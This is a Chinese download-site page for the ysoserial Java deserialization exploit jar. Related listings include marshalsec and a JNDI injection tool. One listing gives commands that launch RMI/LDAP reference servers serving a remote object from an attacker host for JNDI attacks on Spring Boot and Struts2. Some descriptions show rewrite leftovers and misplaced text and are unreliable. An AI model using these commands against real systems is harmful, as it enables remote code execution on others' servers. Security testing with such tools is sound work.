Advertisement

该软件包名为ysoserial-0.0.6-SNAPSHOT-all.jar。

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:None

简介:
ysoserial-0.0.6-SNAPSHOT-all.jar 包文件

全部评论 (0)

还没有任何评论哟~
客服
客服
客服关闭
  • ysoserial-0.0.6-SNAPSHOT-all.jar
    优质
    ysoserial-0.0.6-SNAPSHOT-all.jar是一款用于生成各种常用Java反序列化漏洞利用链的工具包,帮助安全研究人员测试应用系统的反序列化风险。 ysoserial-0.0.6 可自行下载编译。提供一个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar 重写后: ysoserial-0.0.6 可自行下载编译。
  • ysoserial-0.0.6-SNAPSHOT-all.jar
    优质
    ysoserial-0.0.6-SNAPSHOT-all.jar是一款用于生成各种常见Java反序列化漏洞利用链码的工具,帮助安全研究人员测试应用系统对Java反序列化的安全性。 ysoserial-0.0.6-SNAPSHOT-all.jar是一款工具jar包。
  • ysoserial-0.0.6-SNAPSHOT-all.jar
    优质
    ysoserial-0.0.6-SNAPSHOT-all.jar是一款用于创建利用Java反序列化漏洞的payload的工具集,主要用于安全测试和研究。 ysoserial-0.0.6-SNAPSHOT-all.jar
  • 新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
    优质
    ysoserial是一款用于生成各种序列化对象以进行安全测试和研究的工具。此版本(0.0.6-SNAPSHOT-BETA)为开发者提供了最新的功能更新与漏洞利用示例,助力于深入探索Java反序列化的安全性问题。 GitHub上的文件已经很难下载了,作者已将文件上传到其他平台。我在使用过程中遇到了一些问题,在正确更改原文件名后才能正常使用。
  • ysoserial-0.0.6-SNAPSHOT-all工具
    优质
    ysoserial-0.0.6-SNAPSHOT-all 是一个针对Java反序列化漏洞的安全研究工具集,包含多种利用链和payload生成器,用于测试应用系统的安全性。 Apache Log4j 是一个适用于 Java 的日志记录库,并支持连接到远程日志服务器。在 Apache Log4j 2.8.2 版本之前的 2.x 系列版本中存在安全漏洞,攻击者可以利用这一漏洞来执行任意代码。这种类型的反序列化问题是可以被利用的。
  • marshalsec-0.0.3-SNAPSHOT-all.jar
    优质
    marshalsec-0.0.3-SNAPSHOT-all.jar是一款用于测试和研究Java远程方法调用(RMI)及其它基于对象的协议安全性的工具包,包含多种恶意和服务模式。 Moritz Bechler编写了一个工具,源码可以从GitHub下载。使用Maven编译后得到一个jar包,方便那些没有编译环境的用户直接运行该jar包来开启RMI或LDAP服务。 要启动RMI服务,请执行以下命令: ``` java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS/ExportObject 1099 ``` 要启动LDAP服务,请使用如下命令: ``` java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS/ExportObject 1389 ``` 这个工具可以用来测试Spring Boot Jolokia的远程命令执行,也可以用于检测Struts2 S系列漏洞。
  • marshalsec-0.0.3-SNAPSHOT-all.jar
    优质
    marshalsec-0.0.3-SNAPSHOT-all.jar是一款用于网络安全研究和测试的应用程序jar包,包含多种服务模拟器,主要用于检验远程对象序列化相关的安全漏洞。 marshalsec 官方不提供 jar 包下载,编译过程中遇到了一些错误,但我最终成功完成了编译。如果有需要的朋友可以使用我编译好的版本。
  • JNDI-Injection-Vulnerability-1.0-SNAPSHOT-all.jar
    优质
    JNDI-Injection-Vulnerability-1.0-SNAPSHOT-all.jar是一个用于演示和测试JNDI注入漏洞的Java应用程序jar包,帮助开发者理解并防范此类安全风险。 JNDI(Java Naming and Directory Interface)是Java平台提供的一种服务,用于访问目录和命名工件。它允许应用程序通过统一且标准的方式查找并使用各种资源和服务,如数据库连接、远程对象和其他类型的资源。JNDI 提供了一种与特定实现无关的方法来定位这些资源,并为 Java 应用程序提供了强大的工具以简化管理和配置过程。
  • ysoserial-master.zip工具
    优质
    ysoserial-master.zip是一款用于创建序列化对象的安全研究工具包,广泛应用于测试Java应用程序中反序列化的安全性。它支持多种 gadget 链以实现不同的攻击目标。 ysoserial是一个用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。它包含一系列在常见Java库中发现的gadget chains,可以在特定条件下利用执行不安全的反序列化操作的Java应用程序。该项目最初于2015年AppSecCali会议上提出,涵盖了针对Apache Commons Collections(3.x和4.x版本)、Spring BeansCore(4.x版本)以及Groovy(2.3.x版本)的漏洞利用链。
  • SmartKit(原OceanStor Toolkit)
    优质
    华为SmartKit软件(原名OceanStor Toolkit)是一款全面集成的运维工具包,专为华为存储和数据中心解决方案设计,支持设备部署、配置及日常维护。 华为SmartKit是原OceanStor Toolkit的升级版,现更名为SmartKit。它为存储、服务器和云计算三大领域的产品提供了统一的服务工具平台,并支持所有原有的OceanStor Toolkit功能。